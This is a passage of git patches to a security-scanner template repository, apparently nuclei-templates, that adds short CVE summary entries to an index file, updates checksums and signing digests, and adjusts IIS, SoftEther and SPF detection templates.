publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} @@ -2257,8 +2258,10 @@ {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} +{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} +{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} @@ -2267,6 +2270,8 @@ {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} {"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"} {"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"} +{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"} +{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} @@ -2295,6 +2300,8 @@ {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} +{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} @@ -2307,6 +2314,9 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} +{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f16efa320f..fc1928fe0c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d1c0809e63305403ca431401cfcebe07 +0718093f8377862f2723b488bb15e23a From e8b983ce786ddb7655c08a9bb4a0c8bdd56fc359 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Wed, 20 Mar 2024 14:43:33 +0000 Subject: [PATCH 34/53] Update fingerprinthub-web-fingerprints.yaml --- http/technologies/fingerprinthub-web-fingerprints.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index d2c5098ffb..e42e6eb61e 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -11440,6 +11440,7 @@ http: name: softether-vpn words: -
  • manage this vpn server or vpn bridge
      + case-insensitive: true - type: word name: softnext-spam From 752b0fbc3d0dfaf473b1990278acf6e482f3d6ec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 20 Mar 2024 23:12:09 +0530 Subject: [PATCH 35/53] Update microsoft-iis-version.yaml --- http/technologies/microsoft/microsoft-iis-version.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index 7a85340474..ac03e25967 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -9,11 +9,14 @@ info: max-request: 1 tags: tech,microsoft,iis + http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 4 matchers-condition: and matchers: - type: word @@ -21,10 +24,6 @@ http: words: - "IIS" - - type: status - status: - - 200 - extractors: - type: kval part: header From afc3d77d80752f203f79db73090b33255fa86273 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:10 +0000 Subject: [PATCH 36/53] Auto Generated New Template Addition List [Wed Mar 20 17:44:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e60a673523..47df011d4e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/spf-record-detect.yaml dns/txt-service-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml From 1b191f5fc4d2361a13e2fdc6370ea336848d2603 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:44:22 +0000 Subject: [PATCH 37/53] Auto Generated Templates Checksum [Wed Mar 20 17:44:22 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6048164bfe..e2f8d3cfd0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -105,8 +105,8 @@ config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605 -cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4 +cves.json:3b21f179e553a113562af785def57c341b663071 +cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -123,9 +123,10 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b +dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 -dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 +dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 @@ -4536,7 +4537,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 -http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 +http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -6681,7 +6682,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 -http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 +http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 @@ -8175,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f +templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2d38339db725bdb9c6035f8b2a6b7f9bd4111f7e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:52 +0000 Subject: [PATCH 38/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 52ff2ed46f..9f93d3bc1e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/spf-record-detect.yaml' - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' From a61b8cb7f77b5b87f62a7ea5552d6e92f8ff2079 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:46:15 +0000 Subject: [PATCH 39/53] Auto Template Signing [Wed Mar 20 17:46:15 UTC 2024] :robot: --- dns/spf-record-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index c5583ab23a..7a9a051fd7 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -22,3 +22,4 @@ dns: - type: regex regex: - "v=spf1(.+)" +# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 603a75175f8e5ec5b0e62f06d5a1af95111c584d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:18:58 +0000 Subject: [PATCH 40/53] Auto Generated Templates Checksum [Wed Mar 20 18:18:58 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2f8d3cfd0..6ba563c418 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -123,7 +123,7 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b -dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 +dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 @@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292 +http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 +templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50de72defbbbc03e31c92014bfb93d37c5b60b06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:20:56 +0000 Subject: [PATCH 41/53] Auto Template Signing [Wed Mar 20 18:20:56 UTC 2024] :robot: --- http/technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index afff283113..ca2ef4cc89 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -15065,4 +15065,4 @@ http: words: - "x-dispatcher:" case-insensitive: true -# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 994d44ecf799788482d8950df621e2eceffca47c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:19:36 +0000 Subject: [PATCH 43/53] Auto Generated Templates Checksum [Wed Mar 20 19:19:36 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6ba563c418..b1f3af28bf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 +http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 @@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 